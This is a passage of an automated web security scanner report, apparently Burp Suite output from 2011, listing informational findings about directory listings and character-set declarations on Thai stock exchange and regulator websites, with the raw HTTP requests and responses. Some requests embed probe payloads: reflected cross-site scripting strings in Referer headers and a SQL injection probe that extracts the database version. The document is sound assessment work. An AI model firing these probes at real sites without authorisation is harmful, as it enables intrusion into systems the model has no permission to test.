Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 15:23:28 GMT
Connection: close
Content-Type: text/html
Content-Length: 172

<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>

19.5. http://register2.set.or.th/styles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://register2.set.or.th
Path:	/styles/

Request

GET /styles/ HTTP/1.1
Referer: http://register2.set.or.th/styles/regStyle.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 15:22:10 GMT
Connection: close
Content-Type: text/html
Content-Length: 172

<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>

19.6. http://weblink.settrade.com/brokerpage/IPO/images/right_menu/r_menur-02.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weblink.settrade.com
Path:	/brokerpage/IPO/images/right_menu/r_menur-02.gif

Request

Response

19.7. http://www.cgthailand.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cgthailand.org
Path:	/

Request

GET / HTTP/1.1
Host: www.cgthailand.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/regulations/cg/roles_p1.html

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:01:29 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
Last-Modified: Mon, 13 Dec 2010 09:32:46 GMT
ETag: "9688-1e9-62fc0b80"
Accept-Ranges: bytes
Content-Length: 489
Content-Type: text/html

<!--
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>CG Thailand</TITLE>
<META NAME="Generator" CONTENT="EditPlus">
<META NAME="Author" CONTENT="">
<META NAME="Key
...[SNIP]...

19.8. http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/app/scripts/ajaxModules/'+upickemDeals[0][2]+'

Request

GET /app/scripts/ajaxModules/'+upickemDeals[0][2]+' HTTP/1.1
Host: www.maysville-online.com
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00c8fc6'%3balert(document.cookie)//110369244fe&regLink=true&title=&upickemSignup=&limit=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Tue, 03 May 2011 17:36:19 GMT
X-TN-ServedBy: cms.web.80
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
Real-Hostname: maysville-online.com
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 2085

<html>
<head>
<title>404: File Not Found</title>
<script language="javascript">

<!-- Hide from older browsers

// Print the name of the URL requested so it appears

...[SNIP]...

19.9. http://www.set.or.th/chalard_orm/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/chalard_orm/

Request

GET /chalard_orm/ HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://banner2.set.or.th/www/delivery/afr.php?n=a2713007&zoneid=8&target=_blank&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=38

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:44:33 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 10:25:14 GMT
ETag: "ccd5a-9f-6b927680"
Accept-Ranges: bytes
Content-Length: 159
Content-Type: text/html

<html>
<head>
<title></title>
<meta http-equiv="Refresh" content="0;URL=http://www.set.or.th/chalard_orm/chalard_orm.html">
</head>
<body></body>
</html>

19.10. http://www.set.or.th/setresearch/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/setresearch/

Request

GET /setresearch/ HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/contact/contact.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=25

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:24:49 GMT
Server: Apache
Last-Modified: Mon, 05 Jun 2006 04:25:09 GMT
ETag: "53827e-7c-85051340"
Accept-Ranges: bytes
Content-Length: 124
Content-Type: text/html

<html>
<head>
<meta http-equiv="Refresh" content="0;URL=/setresearch/setresearch.html">
</head>
<body></body>
</html>

20. HTML uses unrecognised charset previous next
There are 32 instances of this issue:

http://capital.sec.or.th/webapp/nrs/whatsnew_en.php
http://capital.sec.or.th/webapp/nrs/whatsnew_nrs_en.php
http://capital.sec.or.th/webapp/nrs/whatsnew_nrs_th.php
http://capital.sec.or.th/webapp/nrs/whatsnew_th.php
http://marketdata.set.or.th/mkt/ftsequotation.do
http://marketdata.set.or.th/mkt/sectorquotation.do
http://marketdata.set.or.th/mkt/stockquotation.do
http://marketdata.set.or.th/static/market/set/indextab_en_US.html
http://register2.set.or.th/semreg/List.aspx
http://register2.set.or.th/semreg/detail.aspx
http://register2.set.or.th/semreg/enroll.aspx
http://weblink.settrade.com/actions/customization/IPO/setIndexHome.jsp
http://weblink.settrade.com/actions/customization/IPO/tfexHome_en.jsp
http://www.set.or.th/chalard_orm/chalard_orm.html
http://www.set.or.th/en/about/holidays/holidays_p1.html
http://www.set.or.th/en/products/bonds/bonds_p1.html
http://www.set.or.th/head-en.html
http://www.set.or.th/highlight/release_en_US.html
http://www.set.or.th/nicepage_404.html
http://www.set.or.th/set/eventdetail.do
http://www.set.or.th/set/memberlist.do
http://www.set.or.th/set/newsdetails.do
http://www.set.or.th/set/newslist.do
http://www.set.or.th/set/newsrelease.do
http://www.set.or.th/set/oppdaybyperiod.do
http://www.set.or.th/set/xcalendar.do
http://www.set.or.th/setresearch/setresearch-search.html
http://www.set.or.th/setresearch/setresearch.html
http://www.set.or.th/shortcut-en.html
http://www.set.or.th/static/news/latestnews_en_US.html
http://www.thai-iod.com/
http://www.thai-iod.com/en/index.asp

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

20.1. http://capital.sec.or.th/webapp/nrs/whatsnew_en.php previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://capital.sec.or.th
Path:	/webapp/nrs/whatsnew_en.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-874

Request

GET /webapp/nrs/whatsnew_en.php HTTP/1.1
Host: capital.sec.or.th
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/view/view.jsp?lang=thcdf1c'%3balert(1)//9465eb3d2be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 17:45:27 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8h PHP/4.3.3
X-Powered-By: PHP/4.3.3
Content-Type: text/html
Content-Length: 3812

<meta http-equiv="content-type" content="text/html; charset=windows-874">
<LINK Rel="stylesheet" Href="/sec_web_css.css" Type="text/css">
<!----------------------------------------------------- begin
...[SNIP]...

20.2. http://capital.sec.or.th/webapp/nrs/whatsnew_nrs_en.php previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://capital.sec.or.th
Path:	/webapp/nrs/whatsnew_nrs_en.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-874

Request

GET /webapp/nrs/whatsnew_nrs_en.php HTTP/1.1
Host: capital.sec.or.th
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/view/view.jsp?lang=thcdf1c'%3balert(1)//9465eb3d2be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 17:45:28 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8h PHP/4.3.3
X-Powered-By: PHP/4.3.3
Content-Type: text/html
Content-Length: 4236

<meta http-equiv="content-type" content="text/html; charset=windows-874">
<LINK Rel="stylesheet" Href="/sec_web_css.css" Type="text/css">
<!-------------------------------------------begin what's new-
...[SNIP]...

20.3. http://capital.sec.or.th/webapp/nrs/whatsnew_nrs_th.php previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://capital.sec.or.th
Path:	/webapp/nrs/whatsnew_nrs_th.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-874

Request

GET /webapp/nrs/whatsnew_nrs_th.php HTTP/1.1
Host: capital.sec.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/view/view.jsp?lang=th

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:04:13 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8h PHP/4.3.3
X-Powered-By: PHP/4.3.3
Content-Type: text/html
Content-Length: 4759

<meta http-equiv="content-type" content="text/html; charset=windows-874">
<LINK Rel="stylesheet" Href="/sec_web_css.css" Type="text/css">
<!-------------------------------------------begin what's new-
...[SNIP]...

20.4. http://capital.sec.or.th/webapp/nrs/whatsnew_th.php previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://capital.sec.or.th
Path:	/webapp/nrs/whatsnew_th.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-874

Request

GET /webapp/nrs/whatsnew_th.php HTTP/1.1
Host: capital.sec.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/view/view.jsp?lang=th

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:03:29 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8h PHP/4.3.3
X-Powered-By: PHP/4.3.3
Content-Type: text/html
Content-Length: 5553

<meta http-equiv="content-type" content="text/html; charset=windows-874">
<LINK Rel="stylesheet" Href="/sec_web_css.css" Type="text/css">
<!-------------------------------------------begin what's ne
...[SNIP]...
</tr><meta http-equiv='Content-Type' content='text/html; charset=windows-874'>
<link href='/sec_web_css.css' rel='Stylesheet' type='text/css'>

<meta http-equiv='Content-Type' content='text/html; charset=windows-874'>
<link href='/sec_web_css.css' rel='Stylesheet' type='text/css'>
...[SNIP]...

20.5. http://marketdata.set.or.th/mkt/ftsequotation.do previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://marketdata.set.or.th
Path:	/mkt/ftsequotation.do

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

Response

20.6. http://marketdata.set.or.th/mkt/sectorquotation.do previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://marketdata.set.or.th
Path:	/mkt/sectorquotation.do

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

Response

20.7. http://marketdata.set.or.th/mkt/stockquotation.do previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://marketdata.set.or.th
Path:	/mkt/stockquotation.do

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

Response

20.8. http://marketdata.set.or.th/static/market/set/indextab_en_US.html previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://marketdata.set.or.th
Path:	/static/market/set/indextab_en_US.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

Response

20.9. http://register2.set.or.th/semreg/List.aspx previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://register2.set.or.th
Path:	/semreg/List.aspx

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-874

Request

GET /semreg/List.aspx?ow=%22 HTTP/1.1
Referer: http://register2.set.or.th/semreg/enroll.aspx?ow=FKH&cs=//www.netsparker.com?&sn=0049
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 15:17:59 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 4159

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>Registration Form</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="True" name="vs_sho
...[SNIP]...

20.10. http://register2.set.or.th/semreg/detail.aspx previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://register2.set.or.th
Path:	/semreg/detail.aspx

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-874

Request

GET /semreg/detail.aspx?ow='%2B%20convert(int,CHAR(95)%2bCHAR(33)%2bCHAR(64)%2b(SELECT%20@@VERSION)%2bCHAR(95)%2bCHAR(33)%2bCHAR(64))%20%2B'&cs=S0001&sn=0049 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:19:16 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 6009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>detail</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="Microsoft Visual Studio .NET
...[SNIP]...

20.11. http://register2.set.or.th/semreg/enroll.aspx previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://register2.set.or.th
Path:	/semreg/enroll.aspx

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-874

Request

GET /semreg/enroll.aspx?ow=FKH&cs=S0001&sn=0050 HTTP/1.1
Host: register2.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://register2.set.or.th/semreg/detail.aspx?ow=FKH&cs=S0001&sn=0050
Cookie: ASP.NET_SessionId=2nr0a545weyfl4ivrwijkwi5; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:16:56 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 101249

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>enroll</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="True" name="vs_showGrid">

...[SNIP]...

20.12. http://weblink.settrade.com/actions/customization/IPO/setIndexHome.jsp previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://weblink.settrade.com
Path:	/actions/customization/IPO/setIndexHome.jsp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-874

Request

Response

20.13. http://weblink.settrade.com/actions/customization/IPO/tfexHome_en.jsp previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://weblink.settrade.com
Path:	/actions/customization/IPO/tfexHome_en.jsp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-874

Request

Response

20.14. http://www.set.or.th/chalard_orm/chalard_orm.html previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/chalard_orm/chalard_orm.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

Response

20.15. http://www.set.or.th/en/about/holidays/holidays_p1.html previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/en/about/holidays/holidays_p1.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:06:40 GMT
Server: Apache
Last-Modified: Tue, 22 Feb 2011 13:25:12 GMT
ETag: "dc70b-9c80-e8f6be00"
Accept-Ranges: bytes
Content-Length: 40064
Content-Type: text/html

<html>
<head>

<title>The Stock Exchange of Thailand: Your Inves
...[SNIP]...
market, equity, bond, derivatives, etf, stock market, quotes, financial, internet trading, listed companies, IPO, regulations, broker, market data, investment information, news, investor education">
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

20.16. http://www.set.or.th/en/products/bonds/bonds_p1.html previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/en/products/bonds/bonds_p1.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:24:47 GMT
Server: Apache
Last-Modified: Fri, 09 Jul 2010 09:51:33 GMT
ETag: "7800a5-65b3-5912d340"
Accept-Ranges: bytes
Content-Length: 26035
Content-Type: text/html

<html>
<head>

<title>The Stock Exchange of Thailand - Products
...[SNIP]...
market, equity, bond, derivatives, etf, stock market, quotes, financial, internet trading, listed companies, IPO, regulations, broker, market data, investment information, news, investor education">
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

20.17. http://www.set.or.th/head-en.html previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/head-en.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

GET /head-en.html HTTP/1.1
Host: www.set.or.th
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/newslist.do?language=en&country=US&to=&exchange=true&submit=Search&newsType=CASH_BALANCE&exchangeSymbols=&companyNews=on&from=&exchangeNews=on&company=true&symbol=&headline=to+be+traded+in+Cash+Balance&c7b03'%3E%3Cscript%3Ealert(1)%3C/script%3Ebdd3572e91d=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 17:36:37 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 10:40:47 GMT
ETag: "498e91-107f-803e89c0"
Accept-Ranges: bytes
Content-Length: 4223
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's Capital Market</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

20.18. http://www.set.or.th/highlight/release_en_US.html previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/highlight/release_en_US.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

Response

20.19. http://www.set.or.th/nicepage_404.html previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/nicepage_404.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-874

Request

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 17:37:06 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 08:51:20 GMT
ETag: "498e9e-33cf-de27d200"
Accept-Ranges: bytes
Content-Length: 13263
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
market, equity, bond, derivatives, etf, stock market, quotes, financial, internet trading, listed companies, IPO, regulations, broker, market data, investment information, news, investor education">
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

20.20. http://www.set.or.th/set/eventdetail.do previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/set/eventdetail.do

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

Response

20.21. http://www.set.or.th/set/memberlist.do previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/set/memberlist.do

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

Response

20.22. http://www.set.or.th/set/newsdetails.do previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/set/newsdetails.do

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

Response

20.23. http://www.set.or.th/set/newslist.do previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/set/newslist.do

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

GET /set/newslist.do?language=en&country=US&to=&exchange=true&submit=Search&newsType=CASH_BALANCE&exchangeSymbols=&companyNews=on&from=&exchangeNews=on&company=true&symbol=&headline=to+be+traded+in+Cash+Balance HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

20.24. http://www.set.or.th/set/newsrelease.do previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/set/newsrelease.do

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

Response

20.25. http://www.set.or.th/set/oppdaybyperiod.do previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/set/oppdaybyperiod.do

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

GET /set/oppdaybyperiod.do?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

20.26. http://www.set.or.th/set/xcalendar.do previous next

Summary

Severity:	Information
